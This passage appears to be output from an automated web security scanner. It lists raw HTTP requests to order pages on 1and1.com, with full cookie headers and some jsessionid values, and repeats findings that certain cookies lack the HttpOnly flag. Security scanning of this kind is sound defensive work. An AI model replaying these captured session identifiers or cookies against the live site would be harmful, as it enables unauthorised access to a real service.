GET /xml/order/CloudDynamicServer HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=10de75d96fe89000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Contact HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Domaininfo;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=79161ecc06ae0c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Domaininfo HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=69cc255bf110d400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/DomaininfoMove HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=17a1be1e9220e400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Eshops HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7e3e5cc19ca64c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsChat HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsChat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=74fc0aa587c04000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsDialogue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsDialogue;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsMerchandise;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7baf8e23846d6000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsMerchandise HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsNewsletter;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2a108f85d005a000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsNewsletter HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureControlCenter;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=73692ad413d39c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureControlCenter HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=39c7e664d5cb4800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
